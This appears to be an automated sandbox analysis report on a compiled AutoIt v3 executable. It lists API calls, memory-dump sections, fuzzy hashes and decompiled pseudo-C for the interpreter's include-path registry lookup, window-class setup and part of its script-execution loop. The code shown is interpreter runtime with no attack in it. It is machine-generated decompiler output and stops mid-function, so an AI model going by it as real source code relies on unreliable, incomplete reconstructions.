                            0x00ab7345
                            0x00ab734a
                            0x00ab734d
                            0x00ab7353
                            0x00ab735f
                            0x00ab7364
                            0x00ab7364
                            0x00ab7353
                            0x00ab7367
                            0x00ab736c
                            0x00ab7371
                            0x00ab7377
                            0x00ab737d
                            0x00ab7380
                            0x00ab7385
                            0x00ab738f
                            0x00ab739f
                            0x00ab73a6
                            0x00ab73ad
                            0x00ab73b7
                            0x00ab73ba
                            0x00000000
                            0x00ab73c0
                            0x00ab73c0
                            0x00000000
                            0x00ab73c0
                            0x00ab73ba
                            0x00ab72ed
                            0x00a9e6a9
                            0x00a9e6ad
                            0x00a9e6bd

                            APIs
                              • Part of subcall function 00AA14F7: _malloc.LIBCMT ref: 00AA1511
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00A9E5FF
                            • __wsplitpath.LIBCMT ref: 00A9E61C
                              • Part of subcall function 00AA392E: __wsplitpath_helper.LIBCMT ref: 00AA3970
                            • _wcsncat.LIBCMT ref: 00A9E633
                            • __wmakepath.LIBCMT ref: 00A9E64F
                              • Part of subcall function 00AA39BE: __wmakepath_s.LIBCMT ref: 00AA39D4
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1546
                              • Part of subcall function 00AA14F7: std::exception::exception.LIBCMT ref: 00AA1560
                              • Part of subcall function 00AA14F7: __CxxThrowException@8.LIBCMT ref: 00AA1571
                            • _wcscpy.LIBCMT ref: 00A9E687
                              • Part of subcall function 00A9E6C0: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,00A9E6A1), ref: 00A9E6DD
                            • _wcscat.LIBCMT ref: 00AB7324
                            • _wcslen.LIBCMT ref: 00AB7334
                            • _wcslen.LIBCMT ref: 00AB7345
                            • _wcscat.LIBCMT ref: 00AB735F
                            • _wcsncpy.LIBCMT ref: 00AB739F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                            • String ID: Include$\
                            • API String ID: 3173733714-3429789819
                            • Opcode ID: 11f5f706990dced5440b23f83c5b72de318bf4e8af4121953266cdbd28b43f0f
                            • Instruction ID: f1f4f2d5fc88934e830cd027c000e51b89424c809d9cf64b2ed19ba36d1ca3c4
                            • Opcode Fuzzy Hash: 11f5f706990dced5440b23f83c5b72de318bf4e8af4121953266cdbd28b43f0f
                            • Instruction Fuzzy Hash: B451C1B2804701ABC710EF69DD85CAF73E8FB8D300F50491DF599A32A1EBB19644CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA03E0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00AA03E0() {
				struct _WNDCLASSEXW _v52;
				struct HICON__* _t18;
				intOrPtr _t21;
				void* _t22;
				short _t23;
				void* _t24;
				struct HICON__* _t26;
				struct HICON__* _t28;
				struct HICON__* _t29;
				struct HBRUSH__* _t34;
				int _t36;

				_t34 = GetSysColorBrush(0xf);
				_t26 = LoadCursorW(0, 0x7f00);
				_t18 = LoadIconW( *0xb27520, 0x63); // executed
				 *0xb37f40 = _t18;
				 *0xb37f48 = LoadIconW( *0xb27520, 0xa4);
				 *0xb37f4c = LoadIconW( *0xb27520, 0xa2);
				_t21 =  *0xb39604; // 0x3202f18
				if( *((char*)(_t21 + 0x1f)) == 0) {
					_t22 = E00AD3862(4);
					_t36 = 0;
				} else {
					_t36 = 0;
					_t22 = LoadImageW( *0xb27520, 0x63, 1, 0x10, 0x10, 0); // executed
				}
				_t28 =  *0xb37f40; // 0x6e0381
				_v52.hInstance =  *0xb27520;
				 *0xb37f44 = _t22;
				_v52.cbSize = 0x30;
				_v52.style = 0x23;
				_v52.cbClsExtra = _t36;
				_v52.cbWndExtra = _t36;
				_v52.hCursor = _t26;
				_v52.hbrBackground = _t34;
				_v52.lpszMenuName = _t36;
				_v52.lpszClassName = L"AutoIt v3";
				_v52.hIcon = _t28;
				_v52.hIconSm = _t22;
				_v52.lpfnWndProc = E00A91320;
				_t23 = RegisterClassExW( &_v52);
				_t29 =  *0xb37f40; // 0x6e0381
				 *0xb274e4 = _t23;
				_t24 =  *0xb37f44; // 0x60405
				return E00AA04E0(_t29, _t24);
			}














                            0x00aa03f8
                            0x00aa0406
                            0x00aa0410
                            0x00aa041e
                            0x00aa0431
                            0x00aa0438
                            0x00aa043d
                            0x00aa0446
                            0x00ab82e1
                            0x00ab82e9
                            0x00aa044c
                            0x00aa0452
                            0x00aa045e
                            0x00aa045e
                            0x00aa046a
                            0x00aa0470
                            0x00aa0477
                            0x00aa047c
                            0x00aa0483
                            0x00aa048a
                            0x00aa048d
                            0x00aa0490
                            0x00aa0493
                            0x00aa0496
                            0x00aa0499
                            0x00aa04a0
                            0x00aa04a3
                            0x00aa04a6
                            0x00aa04ad
                            0x00aa04b3
                            0x00aa04b9
                            0x00aa04bf
                            0x00aa04d1

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 00AA03EB
                            • LoadCursorW.USER32(00000000,00007F00), ref: 00AA03FA
                            • LoadIconW.USER32(?,00000063), ref: 00AA0410
                            • LoadIconW.USER32(?,000000A4), ref: 00AA0423
                            • LoadIconW.USER32(?,000000A2), ref: 00AA0436
                            • LoadImageW.USER32 ref: 00AA045E
                            • RegisterClassExW.USER32 ref: 00AA04AD
                              • Part of subcall function 00AA04E0: GetSysColorBrush.USER32(0000000F), ref: 00AA0513
                              • Part of subcall function 00AA04E0: RegisterClassExW.USER32 ref: 00AA053D
                              • Part of subcall function 00AA04E0: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA054E
                              • Part of subcall function 00AA04E0: InitCommonControlsEx.COMCTL32(00B390E8), ref: 00AA056B
                              • Part of subcall function 00AA04E0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA057B
                              • Part of subcall function 00AA04E0: LoadIconW.USER32(00A90000,000000A9), ref: 00AA0592
                              • Part of subcall function 00AA04E0: ImageList_ReplaceIcon.COMCTL32(00CECC18,000000FF,00000000), ref: 00AA05A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: 332f2b01c2f4f95ec3e623c736e474ed2d25bedb1b5c9f27fe10d7925495813a
                            • Instruction ID: 310ee4ae86d2773fbcec8dcfa4319c7fd18024d7d2744b238caf213b4322cf5a
                            • Opcode Fuzzy Hash: 332f2b01c2f4f95ec3e623c736e474ed2d25bedb1b5c9f27fe10d7925495813a
                            • Instruction Fuzzy Hash: C52121B1D85314ABD720DF99EC85B9EBBB9FB4C700F10415AE504A7294DFB45500CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A9A9D0, Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                            Download Yara Rule
                            C-Code - Quality: 62%
                            			E00A9A9D0(void __ecx, void* __fp0, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
				char _v28;
				void _v32;
				char _v48;
				char _v52;
				intOrPtr _v56;
				void* _v60;
				char _v64;
				char _v68;
				void _v72;
				char _v76;
				void _v80;
				char _v84;
				char _v85;
				void* _v92;
				char _v95;
				short _v96;
				void _v100;
				void* _v104;
				void* _v108;
				void _v112;
				char _v115;
				short _v116;
				char _v119;
				void* _v120;
				void* _v124;
				void* _v128;
				void _v136;
				void* _v140;
				char _v148;
				void* _v152;
				void* _v156;
				void _v160;
				void __ebx;
				void* __edi;
				void* __esi;
				void* _t371;
				intOrPtr _t380;
				void* _t381;
				void* _t382;
				void** _t384;
				void* _t385;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t390;
				void* _t409;
				void* _t411;
				void* _t412;
				void* _t413;
				signed int _t414;
				void* _t422;
				void** _t427;
				void* _t428;
				void* _t430;
				void* _t431;
				void* _t438;
				void* _t442;
				void* _t443;
				void* _t446;
				void* _t448;
				void* _t449;
				void* _t450;
				void* _t451;
				signed int _t452;
				void* _t459;
				void _t490;
				short _t491;
				void* _t492;
				void* _t493;
				void* _t494;
				void** _t495;
				void* _t496;
				void* _t499;
				void* _t501;
				void** _t502;
				void* _t503;
				signed int _t508;
				void** _t517;
				void* _t521;
				void* _t525;
				void* _t531;
				void* _t534;
				void* _t546;
				void _t547;
				void* _t551;
				void _t554;
				signed int* _t559;
				void* _t563;
				signed int _t572;
				void* _t574;
				void* _t575;
				void* _t594;

				_t594 = __fp0;
				_t574 = (_t572 & 0xfffffff8) - 0x84;
				_v112 = __ecx;
				_t580 =  *0xb39600 & 0x00000001;
				if(( *0xb39600 & 0x00000001) == 0) {
					 *0xb39600 =  *0xb39600 | 0x00000001;
					 *0xb395f0 = 0;
					 *0xb395f8 = 1;
					 *0xb395fc = 0;
					E00AA122A(__eflags, 0xab5b41);
					_t574 = _t574 + 4;
				}
				_t563 = _a12;
				_push(8);
				_v96 = 1;
				_v128 = _t563;
				_v124 = 0;
				_v120 = 0;
				_v116 = 1;
				_t371 = E00AA14F7(0, _t563, _t580);
				_t575 = _t574 + 4;
				if(_t371 == 0) {
					_t371 = 0;
				} else {
					 *_t371 = 0x14;
				}
				 *((intOrPtr*)(_t371 + 4)) = 0;
				_t559 = _a8;
				_v100 = _t371;
				_v104 = 1;
				_v108 = 0x17;
				_v92 = ( *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4))[2];
				while(1) {
					L4:
					_t508 =  *_t559;
					if(_t508 == _a16) {
						goto L9;
					}
					L5:
					_t380 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + _t508 * 4));
					if( *((short*)(_t380 + 8)) == 0x7f) {
						goto L9;
					}
					_t491 =  *((short*)(_t380 + 8));
					if(_t491 == 0x36) {
						_t492 = _v124;
						_v108 = 0x16;
						__eflags = _t492;
						if(_t492 != 0) {
							__eflags = _v115;
							if(__eflags == 0) {
								_push(0x18);
								_t381 = E00AA14F7(_t559, _t563, __eflags);
								_t575 = _t575 + 4;
								__eflags = _t381;
								if(_t381 == 0) {
									_t382 = 0;
								} else {
									_v136 = _t381;
									_t496 = _v136;
									E00A9BBB0(0xb395f0, _t496, _t508, _t559);
									_t382 = _t496;
									_t492 = _v124;
								}
								 *((intOrPtr*)(_t382 + 0x10)) = _v120;
								_v120 = _t382;
							} else {
								E00A990D0(_v120, _t508, 0xb395f0);
								_t492 = _v128;
								_v119 = 0;
							}
							L31:
							_t384 =  *( *((intOrPtr*)(_a4 + 4)) +  *_t559 * 4);
							_t493 = _t492 + 1;
							_v124 = _t493;
							__eflags = _t493 - 1;
							if(_t493 != 1) {
								__eflags = _v115;
								_t543 = _v120;
								if(_v115 != 0) {
									_v136 =  *((intOrPtr*)(_t543 + 0x10));
								} else {
									_v136 = _t543;
								}
							} else {
								_v136 = _t563;
							}
							_t517 = _v136;
							_t494 =  *_t384;
							_t385 = _t517[3];
							__eflags = _t385;
							if(_t385 != 0) {
								E00AD651E(_t385);
								_t517 = _v140;
								_t517[3] = 0;
							}
							_t387 = _t517[2];
							__eflags = _t387 - 8;
							if(_t387 == 8) {
								_t543 =  *_t517;
								__eflags = _t543;
								if(_t543 == 0) {
									goto L35;
								}
								__imp__#9(_t543);
								_t543 =  *_v140;
								_push( *_v140);
								E00AA10FC();
								_t575 = _t575 + 4;
								goto L39;
							} else {
								L35:
								__eflags = _t387 - 0xa;
								if(_t387 == 0xa) {
									_t518 =  *_t517;
									__eflags =  *_t517;
									if(__eflags != 0) {
										E00AD30B0(_t518);
									}
								} else {
									__eflags = _t387 - 5;
									if(_t387 == 5) {
										E00A9E470(_v136, _t563);
									} else {
										__eflags = _t387 - 0xb;
										if(_t387 == 0xb) {
											_t521 =  *_v136;
											_t543 =  *(_t521 + 4);
											_push( *(_t521 + 4));
											E00AA10FC();
											_push( *_v136);
											E00AA10FC();
											_t575 = _t575 + 8;
										} else {
											__eflags = _t387 - 0xc;
											if(__eflags == 0) {
												_t523 =  *_t517;
												__eflags =  *_t517;
												if(__eflags != 0) {
													E00ADB350(_t523);
												}
											}
										}
									}
								}
								L39:
								_t388 = _v136;
								_push(0x10);
								 *_t388 = 0;
								 *(_t388 + 8) = 4;
								_t389 = E00AA14F7(_t559, _t563, __eflags);
								_t575 = _t575 + 4;
								__eflags = _t389;
								if(_t389 == 0) {
									_t389 = 0;
								} else {
									 *_t389 =  *_t494;
									 *((intOrPtr*)(_t389 + 4)) =  *((intOrPtr*)(_t494 + 4));
									_t543 =  *(_t494 + 8);
									 *(_t389 + 8) =  *(_t494 + 8);
									_t495 =  *(_t494 + 0xc);
									 *(_t389 + 0xc) = _t495;
									 *_t495 =  *_t495 + 1;
									__eflags =  *_t495;
								}
								 *(_v136 + 0xc) = _t389;
								_t390 = _v112;
								 *_t559 = 1 +  *_t559;
								__eflags =  *((char*)(_t390 + 0xfd));
								if( *((char*)(_t390 + 0xfd)) != 0) {
									E00AE7EDD(_t543, __eflags, _t594, E00A9D340( &_v128));
									_t390 = _v116;
								}
								__eflags =  *((char*)(_t390 + 0xfe));
								if( *((char*)(_t390 + 0xfe)) != 0) {
									E00B02F01(_v112, __eflags, _t594, _v112, E00A9D340( &_v128));
								}
								while(1) {
									L4:
									_t508 =  *_t559;
									if(_t508 == _a16) {
										goto L9;
									}
									goto L5;
								}
							}
						}
						__eflags = _t563 - 0xb395f0;
						if(_t563 == 0xb395f0) {
							goto L31;
						}
						_t409 =  *(_t563 + 0xc);
						__eflags = _t409;
						if(_t409 != 0) {
							E00AD651E(_t409);
							 *(_t563 + 0xc) = 0;
						}
						_t411 =  *(_t563 + 8);
						__eflags = _t411 - 8;
						if(_t411 == 8) {
							_t525 =  *_t563;
							__eflags = _t525;
							if(_t525 == 0) {
								goto L25;
							}
							__imp__#9(_t525);
							_push( *_t563);
							E00AA10FC();
							_t575 = _t575 + 4;
							goto L29;
						} else {
							L25:
							__eflags = _t411 - 0xa;
							if(_t411 == 0xa) {
								_t412 =  *_t563;
								__eflags = _t412;
								if(_t412 != 0) {
									E00AD30B0(_t412);
								}
							} else {
								__eflags = _t411 - 5;
								if(_t411 == 5) {
									E00A9E470(_t563, _t563);
								} else {
									__eflags = _t411 - 0xb;
									if(_t411 == 0xb) {
										_push( *((intOrPtr*)( *_t563 + 4)));
										E00AA10FC();
										_push( *_t563);
										E00AA10FC();
										_t575 = _t575 + 8;
									} else {
										__eflags = _t411 - 0xc;
										if(_t411 == 0xc) {
											_t422 =  *_t563;
											__eflags = _t422;
											if(_t422 != 0) {
												E00ADB350(_t422);
											}
										}
									}
								}
							}
							L29:
							 *(_t563 + 8) = 1;
							 *_t563 = 0;
							_t546 =  *0xb395f8; // 0x1
							 *(_t563 + 8) = _t546;
							_t413 =  *0xb395f8; // 0x1
							__eflags = _t413 - 1;
							if(_t413 != 1) {
								_t414 = _t413 - 1;
								__eflags = _t414 - 0xb;
								if(__eflags > 0) {
									goto L31;
								}
								switch( *((intOrPtr*)(_t414 * 4 +  &M00ABBC64))) {
									case 0:
										goto L30;
									case 1:
										 *_t563 =  *0xb395f0;
										 *((intOrPtr*)(_t563 + 4)) =  *0xb395f4;
										goto L31;
									case 2:
										__fp0 =  *0xb395f0;
										 *__esi = __fp0;
										goto L31;
									case 3:
										_push(0x10);
										__eax = E00AA14F7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											 *(__esi + 0xc) = 0;
										} else {
											__ecx =  *0xb395fc;
											__edx =  *__ecx;
											 *__eax =  *__ecx;
											__edx =  *(__ecx + 4);
											 *(__eax + 4) =  *(__ecx + 4);
											__edx =  *(__ecx + 8);
											 *(__eax + 8) = __edx;
											__ecx =  *(__ecx + 0xc);
											 *(__eax + 0xc) = __ecx;
											 *__ecx = 1 +  *__ecx;
											 *(__esi + 0xc) = __eax;
										}
										goto L31;
									case 4:
										_push(0x214);
										__eax = E00AA14F7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = 0;
											__eflags = 0;
										} else {
											__esi =  *0xb395f0;
											__ebx = _v124;
											__ecx = 0x85;
											__edi = __eax;
											__eax = memcpy(__eax, __esi, 0x85 << 2);
											__esi + __ecx = __esi + __ecx + __ecx;
											__ecx = 0;
											__esi = _v128;
											__edi = _a8;
										}
										 *__esi = __eax;
										__eflags =  *(__eax + 4);
										if( *(__eax + 4) != 0) {
											__eax =  *(__eax + 4);
											 *__eax = 1 +  *__eax;
										}
										goto L31;
									case 5:
										__eax =  *0xb395f0;
										 *__esi = __eax;
										goto L31;
									case 6:
										__ecx =  *0xb395f0;
										 *__esi =  *0xb395f0;
										goto L31;
									case 7:
										__eflags =  *0xb395f0;
										if(__eflags != 0) {
											_push(0x10);
											__eax = E00AA14F7(__edi, __esi, __eflags);
											__esp = __esp + 4;
											_push(__eax);
											 *__esi = __eax;
											__imp__#8();
											__edx =  *0xb395f0;
											__eax =  *__esi;
											_push(__edx);
											_push(__eax);
											__imp__#10();
											__eflags = __eax;
											if(__eax < 0) {
												__ecx =  *__esi;
												_push( *__esi);
												__imp__#9();
												__edx =  *__esi;
												_push(__edx);
												__eax = E00AA10FC();
												__esp = __esp + 4;
												 *__esi = 0;
											}
										}
										goto L31;
									case 8:
										__al =  *0xb395f0;
										 *__esi = __al;
										goto L31;
									case 9:
										_push(0x18);
										__eax = E00AA14F7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											goto L255;
										}
										__ecx =  *0xb395f0;
										__eax = E00ADB82F(__eax,  *0xb395f0);
										 *__esi = __eax;
										goto L31;
									case 0xa:
										_push(8);
										__eax = E00AA14F7(__edi, __esi, __eflags);
										 *__esi = __eax;
										__edx =  *0xb395f0;
										__ecx =  *( *0xb395f0);
										 *__eax =  *( *0xb395f0);
										__edx =  *__esi;
										__eax =  *( *__esi);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eflags == 0) {
											_push(1);
											__eax = E00AA14F7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *( *__esi + 4) = __eax;
											__edx =  *__esi;
											__eax =  *(__edx + 4);
											__esp = __esp + 4;
											 *__eax = 0;
										} else {
											_push(__eax);
											__eax = E00AA14F7(__edi, __esi, __eflags);
											__ecx =  *__esi;
											 *( *__esi + 4) = __eax;
											__eax =  *__esi;
											__edx =  *__eax;
											__ecx =  *0xb395f0;
											__eax =  *(__eax + 4);
											__esp = __esp + 4;
											__edx =  *( *0xb395f0 + 4);
											__eax = E00AA0D80(__eax,  *( *0xb395f0 + 4),  *( *0xb395f0 + 4));
										}
										goto L31;
									case 0xb:
										_push(0x14);
										__eax = E00AA14F7(__edi, __esi, __eflags);
										__esp = __esp + 4;
										__eflags = __eax;
										if(__eax == 0) {
											L255:
											__eax = 0;
											 *__esi = 0;
											goto L31;
										}
										__ecx =  *0xb395f0;
										__eax = E00B0082A(__eax,  *0xb395f0);
										 *__esi = __eax;
										goto L31;
								}
							}
							L30:
							_t547 =  *0xb395f0; // 0x0
							 *_t563 = _t547;
							goto L31;
						}
					}
					if(_t491 < 0x37 || _t491 >= 0x41) {
						__eflags = _t491 - 5;
						if(_t491 != 5) {
							__eflags = _t491 - 0x51;
							if(_t491 > 0x51) {
								goto L9;
							}
							_t88 = _t491 + 0xa9b19c; // 0xec
							switch( *((intOrPtr*)(( *_t88 & 0x000000ff) * 4 +  &M00A9B13C))) {
								case 0:
									__eax =  *__eax;
									__eflags = __eax - 4;
									if(__eax < 4) {
										L129:
										__eflags = __eax - 1;
										if(__eax != 1) {
											__eax = __eax - 2;
											__eflags = __eax - 0x27;
											if(__eflags > 0) {
												goto L9;
											}
											__eax =  *(__eax + 0xabbc0c) & 0x000000ff;
											switch( *((intOrPtr*)(__eax * 4 +  &M00ABBBF4))) {
												case 0:
													__ecx = 1 + __ecx;
													__ebx = 8;
													 *__edi = __ecx;
													goto L10;
												case 1:
													__ecx = 1 + __ecx;
													__ebx = 0xa;
													 *__edi = __ecx;
													goto L10;
												case 2:
													__edi = 0xb395f0;
													__esi =  &_v128;
													_v108 = 0x16;
													__eax = E00A9BE60(0xb395f0,  &_v128);
													_v72 = 1;
													__edx = _v72;
													_push(__edx);
													goto L170;
												case 3:
													__edi = 0xb395f0;
													__esi =  &_v128;
													_v108 = 0x16;
													__eax = E00A9BE60(0xb395f0,  &_v128);
													_v80 = 0;
													__ecx = _v80;
													_push(__ecx);
													L170:
													__eax =  &_v128;
													_push(E00A9D340( &_v128));
													__eax = E00AE303E();
													__edi = _a8;
													 *__edi = 1 +  *__edi;
													__esi = _v136;
													goto L4;
												case 4:
													__esp = __esp - 0x10;
													__edi = L"Default";
													__esi = __esp;
													_v108 = 0x16;
													E00A91D10(L"Default", __esp, __eflags) =  &_v28;
													_push( &_v28);
													__eax = E00ADB860();
													__edi = 0xb395f0;
													__esi =  &_v148;
													__eax = E00A9BE60(0xb395f0, __esi);
													__ecx =  &_v48;
													__esi = E00A9D340(__esi);
													__eax = _a8;
													 *_a8 = 1 +  *_a8;
													__ecx =  &_v48;
													__eax = E00A92480(__ecx);
													__esi = _v156;
													__edi = _a8;
													goto L4;
												case 5:
													goto L9;
											}
										}
										__ecx = 1 + __ecx;
										__ebx = __eax + 6;
										 *__edi = __ecx;
										goto L10;
									}
									__eflags = __eax - 0x27;
									if(__eax < 0x27) {
										goto L9;
									}
									goto L129;
								case 1:
									__edi = 0xb395f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E00A9BE60(0xb395f0,  &_v128);
									__eflags = _v124 - 1;
									if(_v124 != 1) {
										__eflags = _v115;
										if(_v115 == 0) {
											__eax = _v120;
										} else {
											__ecx = _v120;
											__eax =  *(_v120 + 0x10);
										}
									} else {
										__eax = _v128;
									}
									__edx = _a4;
									__ebx = _v112;
									__eax = _a8;
									__eax = E00A98F10(_a8, __ebx, __edx, _a8); // executed
									__eflags = __eax;
									if(__eax != 0) {
										goto L285;
									} else {
										__eflags =  *((intOrPtr*)(__ebx + 0xf8)) - 1;
										if( *((intOrPtr*)(__ebx + 0xf8)) == 1) {
											goto L285;
										}
										__esi = _v128;
										__edi = _a8;
										goto L4;
									}
								case 2:
									__edi = 0xb395f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E00A9BE60(0xb395f0, __esi);
									__edi = _a8;
									__edx = _a4;
									__ecx =  *__edi;
									__eax =  *((intOrPtr*)(_a4 + 4));
									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
									__ecx =  *(__eax + 4);
									__ebx =  *__eax;
									__eax = __esi;
									_v32 = __ecx;
									__esi = E00A9D340(__esi);
									__eax = E00A99190(__edi, __esi);
									__edx = _v32;
									 *(__esi + 8) = 2;
									 *__esi = __ebx;
									 *(__esi + 4) = __edx;
									 *__edi = 1 +  *__edi;
									__esi = _v128;
									goto L4;
								case 3:
									__edi = 0xb395f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E00A9BE60(0xb395f0, __esi);
									__edi = _a8;
									__ecx = _a4;
									__eax =  *__edi;
									__edx =  *((intOrPtr*)(_a4 + 4));
									__eax =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
									__fp0 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
									__eax = __esi;
									_v136 =  *( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4));
									__esi = E00A9D340(__esi);
									__eax = E00A99190(__edi, __esi);
									__fp0 = _v136;
									 *__esi = __fp0;
									 *(__esi + 8) = 3;
									 *__edi = 1 +  *__edi;
									__esi = _v128;
									goto L4;
								case 4:
									__edi = 0xb395f0;
									__esi =  &_v128;
									__eax = E00A9BE60(0xb395f0,  &_v128);
									__esi = _a8;
									__eax =  *__esi;
									__edi = _a4;
									__ecx = __eax + 1;
									 *__esi = __eax + 1;
									__edx =  *(__edi + 4);
									__eax =  *( *(__edi + 4) + __eax * 4);
									__eax =  *__eax;
									__edx =  *__eax;
									__esp = __esp - 0x10;
									 *__esp =  *__eax;
									__edx =  *(__eax + 4);
									_v160 =  *(__eax + 4);
									__edx =  *(__eax + 8);
									_v156 =  *(__eax + 8);
									__eax =  *(__eax + 0xc);
									_v152 = __eax;
									 *__eax = 1 +  *__eax;
									__eax =  &_v128;
									__eax = E00A9D340( &_v128);
									__ebx = _v112;
									_push(__eax);
									_push(__ebx);
									__eax = E00B02095(__eflags, __fp0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax =  *__esi;
										__ecx =  *(__edi + 4);
										__edx =  *( *(__edi + 4) +  *__esi * 4 - 4);
										 *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)) = E00AEE724(__fp0, __ebx, 0x86,  *((short*)( *( *(__edi + 4) +  *__esi * 4 - 4) + 0xa)));
										L285:
										__ecx =  &_v128;
										_push( &_v128);
										goto L296;
									}
									__esi = _v128;
									__edi = _a8;
									_v108 = 0x16;
									goto L4;
								case 5:
									__edi = 0xb395f0;
									__esi =  &_v128;
									_v108 = 0x16;
									__eax = E00A9BE60(0xb395f0,  &_v128);
									__eflags = _v124 - 1;
									if(__eflags != 0) {
										__eflags = _v115;
										if(__eflags != 0) {
											__ecx = _v120;
											__eax =  *(_v120 + 0x10);
										} else {
											__eax = _v120;
										}
									} else {
										__eax = _v128;
									}
									__edx = _a4;
									__eax = _v112;
									__eax = _a8;
									__eax = E00A9C440(_a8, __eflags, __fp0, _v112, _a4, _a8);
									__eflags = __eax;
									if(__eax != 0) {
										__eax =  &_v128;
										_push( &_v128);
										goto L296;
									} else {
										__esi = _v128;
										__edi = _a8;
										goto L4;
									}
								case 6:
									__edi = 0xb395f0;
									__esi =  &_v128;
									__eax = E00A9BE60(0xb395f0, __esi);
									__edx =  &_v85;
									__esi = E00A9D340(__esi);
									__esi = _v112;
									__eax = _a4;
									__eax = _a8;
									__eax = E00A998F0(_a8, __eflags, __fp0, __esi, _a4, _a8,  &_v85);
									__eflags = __eax;
									if(__eax != 0) {
										goto L295;
									}
									__eflags =  *((intOrPtr*)(__esi + 0xf8)) - 1;
									if( *((intOrPtr*)(__esi + 0xf8)) == 1) {
										goto L295;
									}
									__esi = _v128;
									__edi = _a8;
									_v108 = 0x16;
									goto L4;
								case 7:
									__eflags = __ecx;
									if(__ecx == 0) {
										L177:
										__esi = _v112;
										__edx = __esi + 0x488;
										__eax = E00AC23E7(__edx);
										__eflags = __al;
										if(__al == 0) {
											__eax = _a4;
											__ecx =  *((intOrPtr*)(_a4 + 4));
											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E00AEE724(__fp0, __esi, 0xa7,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
											__ecx =  &_v140;
											_push( &_v140);
											goto L296;
										}
										__eax = 0;
										__esp = __esp - 0x10;
										_v68 = 0;
										_v56 = 0;
										__eax = __edx;
										__ebx = __esp;
										_v60 = 1;
										__eax = E00A9BBB0(__edx, __ebx, __ecx, __edi);
										__ecx = _a4;
										__eax =  &_v68;
										_push( &_v68);
										_push(__edi);
										_push(_a4);
										__ecx = __esi;
										__eax = E00B0E20C(__esi, __eflags, __fp0);
										__eflags = __eax;
										if(__eax != 0) {
											__eax = _a4;
											__ecx =  *((intOrPtr*)(_a4 + 4));
											 *__edi =  *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4);
											 *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)) = E00AEE724(__fp0, __esi, 0x6e,  *((short*)( *( *((intOrPtr*)(_a4 + 4)) +  *__edi * 4) + 0xa)));
											__esi =  &_v92;
											goto L294;
										}
										__edi =  &_v80;
										__esi =  &_v140;
										_v120 = 0x16;
										__eax = E00A9BE60(__edi,  &_v140);
										__esi = __edi;
										__eax = E00A99190(__edi, __edi);
										__esi = _v140;
										__edi = _a8;
